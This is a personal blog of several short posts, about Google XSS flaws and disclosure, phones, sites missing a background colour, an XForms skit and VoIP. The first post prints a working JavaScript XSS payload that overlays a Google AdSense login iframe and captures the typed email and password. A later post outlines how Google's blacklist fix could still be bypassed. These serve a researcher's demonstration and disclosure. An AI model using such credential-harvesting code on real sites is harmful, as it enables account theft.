Jibbering Musings

Another day, another XSS flaw, this one in Google again, but this is a little more interesting than the normal ones, what this one shows is how JSON results add an extra vector to attack that might be missed by your QA team.

The problem here was that the JSON was returned with a mime-type of text/html, a browser will render that as if it was an HTML page, even if it’s really just a javascript snippet. The easiest way to protect against these is to ensure that all javascript recieved by the XMLHTTPRequest object is returned with a suitable mime-type - application/json That will mean even when you make a mistake and write un-encoded untrusted data to the document, it won’t allow people to attack your site.

The google exploit was reported here, it’s at the time of writing unpatched, unfortunately that was down to the discoverer not giving google any time to fix, whilst they have had their problems before, recently they have patched quickly, so this was not very fair, or wise. Google also appear to be taking testing their own services for security flaws more seriously, they recently had a presentation to the QA team that you can watch on Google Video.

As I’ve said before, the everything on a single domain causes problems, it means any exploit anywhere on the domain, allows you to exploit any service provided for the domain. This exploit is also present in https:// google, so to re-enforce the problem XSS can present to a user, and why XSS is not simply about cookie stealing. Here’s a simple demonstration of using the exploit to steal username and password from google adsense.

The exploit is simply used to create an IFRAME that fills the document and points it to a google adsense login, when the user logs in, the username and password are alerted - also after logging in, then the “today’s earnings” are alerted. Of course a real attacker would not alert these fields, but would sent them off to a site to be collected later. Are google adsense passwords useful? Would you notice if the address or account to get the cash changed until you’d not got the cheque?

The script code is simple, you don’t need to be clever, and phishers generally aren’t stupid, it takes brains to launder money.

document.body.innerHTML="<div><iframe src='https://www.google.com/adsense/report/overview'"+
" onload='go()' style='position:absolute;top:0;left:0;height:100%;width:100%;'></div>";

function go() {
  try {
  var win=window.frames[0];
  win.document.body.style.overflow="hidden";
  win.document.body.style.border="0px solid white";
  var doc=win.frames[0].document.forms[0];
  doc.onsubmit=function() {
   alert("Your adsense username and password are:n"+
   doc["Email"].value+'nandn'+doc["Passwd"].value);
   x=window.open(location.href);
  }
 } catch (e) {
  try {
   var win=window.frames[0];
   var doc=win.document.body;
   var x="Today's Earnings:"+doc.getElementsByTagName('h1')[0];
   alert(x.getElementsByTagName('span')[0].innerHTML.replace(" ",""));
  } catch (e) {}
 }
}

The result is clear:

Fresh from my shiny experiences, I’ve now joined the Orange people. T-Mobile, who I’d happily used for years, finally sent me too many spam text messages, so I had to leave, I chose Orange, thanks to some Lobbying from a friend who wanted to go to the cinema - Orange Wednesday gives customers 2 for 1 cinema tickets for 10p sms charge, and someone else recommended the deal available.

It’s a good deal, and now aswell as my Nokia 1100, I now have a Nokia 6680, it’s a videophone, so I made my first Video call, and completely pointless it was do, I had to get dressed to make it, I had to look at the screen, rather than wander around the room, and the quality wasn’t good enough if someone was trying to show me something actually interesting. It’s unlikely I’ll ever make another video call…

The nost annoying thing about the 6680 though is that it interferes with the audio on the TV when it’s being used, it’s a cheap TV, but GSM phones don’t cause it any problems, and the 6680 in GSM mode don’t cause it a problem. I think other than when I’m using data, I may well keep the 6680 in GSM only mode, the battery life is miles better, and it doesn’t interfere with anything, I certainly wouldn’t recommend 3G for anyone else, stick with the cheaper GSM phones, smaller, neater, better battery life, and more reliable. The 6680 also comes with no games, not even snake, this has depressed me about Nokia, it looks like they’re pandering to the networks to encourage more people to buy downloaded games, they should remember who their real customers are.

Opera 8.0 and wireless IRC have been installed and are working nicely though, The Symbian Opera 8.0’s javascript support looks really good, and the xml http request object works nicely, with all the examples, including the newly added one, working well.

Yesterday I had a good day at opentech which was good fun and met lots of intersting folk, but I missed an opportunity to ask a Yahoo Search bod - Jeremy Zawodny why their search site didn’t bother setting a background colour, so instead, I’m going to start what’s hopefully not a regular look at sites which fail…

• Yahoo
• MSN
• BBC
• Google
• eBay
• AOL

All of the major brands on the web other than Amazon failed to do the most basic QA on their sites, and all of them suffer from developers who don’t really know the common pitfalls of designing. I don’t know why this is, but please sort it out, it really looks bad for your brand - go back to your style guides, and read the bit where it says white backgrounds…

As I didn’t bother linking to the routeplanner last time, I thought I’d mention it again. So here’s a link to my Round The World Route planner…

Scene: A typical office, two people Bob the project manager, and Jim the javascript muppet.

Bob: So Jim, we’ve got another project needing a thin client frontend to run on the desktops here, perfect for another of your HTML weblike frontends.
Jim: Oh cool, I’ve been wanting to try out XForms for that.
Bob: XForms? what are they then, I thought HTML, CSS and javascript was what you did?
Jim: Yeah but I’ve heard about these new things called XForms, apparently they make everything more semantic and easier to maintain.
Bob: You’ve heard? you realise we only have three weeks development in the schedule?
Jim: Oh I’m sure it’s simple, I met a guy in a pub who told me how easy it was, I’m sure I can pick it up.
Bob: Okay, if you’re sure the benefits are worth it, this will work with all our current desktops right?
Jim: Well we’ll need to roll out a new XForms client to all of them.
Bob: Ah, so which client do we use?
Jim: Well, there’s lots to choose from, I’ve heard there are more XForms clients when the standard came out than anything else, so it must be good?
Bob: So which is the best?
Jim: I dunno, give me a few days research time and I’m sure one will turn up.
Bob: So how much is that going to cost us?
Jim: I dunno, There doesn’t seem to be pricing info for most of the XForms players, still the beancounters aren’t doing much at the moment, they can find that out.
Bob: Hmm, but there’s plenty of examples of other people using these XForms in web solutions for us to learn from, right?
Jim: Not that I’ve found, but there’s a specification.
Bob: Okay… If you get hit by a bus, there’s plenty of other people out therewe can hire with the skills to maintain it though?
Jim: Don’t think so, but I’m sure it’d be easy for them to learn it too.
Bob: So, let’s recap. Instead of using the tools we’ve used to successfully roll out tens of projects and people millions, you want us to pick a new technology you know nothing about, with immature implementations that we don’t know the cost of and will need to roll out to every desktop, and there’s few examples to learn from. Then, even when you’ve written it, we won’t be able to easily hire someone to maintain it as the skills are rare, and you don’t think the risk to the project is too high?
Jim: Sure, it’ll be fine, I need to learn the technology sometime right?

Bob walks away and picks up the phone.
Bob: Harry, call up HR, we need a new javascript muppet, this one’s gone a bit crazy.

A long time ago, the webs background colour was a really quite ugly shade of grey, and all was good with the world, as everyone remembered to set the background colour to what they want. Now of course the background colour is white, and no-one remembers - to remind me to always do it, and to make plain text and XML files render easier to read in my browser, I set mine to nice mellow yellow colour. This means I now see so many sites with weird colours, and not crappy little personal sites, but big corporate sites with big web budgets, but obviously no QA. Searching for “com” in google should return some of the major sites on the web today, and what do we see Yahoo without a background colour… Other sites I’ve noticed recently are citibank, AOL, EasyJet.

I’m sure many of these sites spent thousands just on the meetings to pick their brand colours, and then they go and ruin it by not setting the background white? Quite apart from the risk of people with a background colour that doesn’t play nicely with the text colours they choose.

Google seem to have finally fixed the flaw sometime around 6am today, not bad only took them a little over 2 years, so good to know they’re responsive. Actually it seems from the logs that it made it into the google bug tracking system around 4pm yesterday, so 14 hours from then to fully rolled out is actually quite impressive, what’s not impressive is the failure of the security@google.com address and the lack of any phone numbers to contact them.

Google did eventually get in contact with me by email at around 7PM yesterday, 3 hours after they knew about it and an hour after the bugtraq posting they didn’t seem to be overly concerned and claimed “to be aware of the issue” combined with their lack of thanks of me drawing their attention to it suggests that it was actually a known bug they’d just neglected to fix. They said they’d look in to why my security@google.com emails failed to elicit a response, but seemed mostly concerned about getting me to take the exploit page down - I declined that request, it didn’t seem worthwhile as the exploit had by then been mentioned on lots of other sites, so it would’ve done nothing to aid security.

The fix they put in place is still flawed, it relies on special casing the vbscript, javascript and perlscript strings, meaning other language protocols are still at risk in IE with its multiple scripting language capability. The risk is obviously much lower as very few people have other scripting handlers registered, but it could still be used as a vector to attack a corporate installation with known other script engines. What I don’t understand is why instead of blacklisting various strings, they don’t just require it to start http:// - what other protocols do you want in an image on a customised google?

Hopefully Google will get in touch explain what went wrong with the communication of the issue, hopefully google will realise that a phone number of the security team on the web would also help (After trying to explain to Tesco customer support a few years back that there was a non SSL credit card collection problem and getting absolutely nowhere, I’m not going to call normal people with security issues, they don’t understand them) I don’t actually expect them to get back in touch though, they weren’t exactly friendly. Perhaps not surprising as to them it seemed I went public before informing them, but a trivial hole that’d been there for 2 years, I had to do something to get it fixed.

I’m going to do a full write up of the conference some time soon, but while I remember, here’s a few of the talks I wanted to see but didn’t get a chance too, as the presenters couldn’t make it.

Up first, as I mentioned was Locus (PDF report) hopefully we can get the source code for it, as it’d be great to run this at SVG Open 2005, where the university is covered in wireless. More helpful here in japan perhaps, where the lack of phones (for us visitors) made meeting people all the harder. We had IRC though.

Jonathon Phillips was meant to talk about the Open clipart library, I’d not really looked at the library before, but it’s great, a really high standard of artwork with lots that I can actually see using.

I’m sure there were lots I should’ve seen that did happen, but spent my time in other rooms, I’ll write up the highlights of the ones I did see soon.

I’ve recently been looking into a Voice Over IP solution for cheap communication to some guys around the world, aswell as providing a real phone number that can be published but routed easily, and cheaply anywhere in the world.

Voice Over IP seemed the obvious solution, so after a quick chat with some people, and a good read of VOIP.org.uk, I started testing voiptalk.org. It costs nothing to get set up for just an IP phone, and you just buy some talk-time if you want to call real phone lines. I picked up a soft SIP phone from x-ten and tried it out, here on my ADSL line everything worked great, calling out sounded good, there a few tweaks whilst I got the microphone balance right, but you always had to do that with mic’s.

I then spent 3 quid to get myself an incoming number - an 0870 number, so not cheap for people to call me, but still at least they can, I could also get voicemail etc. delivered by email, and outgoing calls are cheap all over the world. Getting a geographic number would be good, but that seems to cost 90 quid a year, so not really only useful if you wanted a presence in a particular UK region. Still it might be a good idea to get a London number, I’m looking for a job at the moment, and people always seem put off about my west-country address - even though it’s really just because that’s the only place I’ve got for a postal address.

Libby talks of FOAF meetups, there’s FOAFCamp and FOAF Galway. I’m pretty sure I’m going to make FOAF Camp, not so sure about FOAF-Galway, as I don’t really fancy the effort of writing a paper, and I’ve got to be in Japan for SVG Open 2004 the week after, so may not have the time - not that I know what I’m doing come september anyway, I’ll probably not have anywhere to work or live.

Don’t let me being at FOAFCamp put you off, I’m sure there’ll be enough people that you can avoid me, if not I’ll buy you a beer…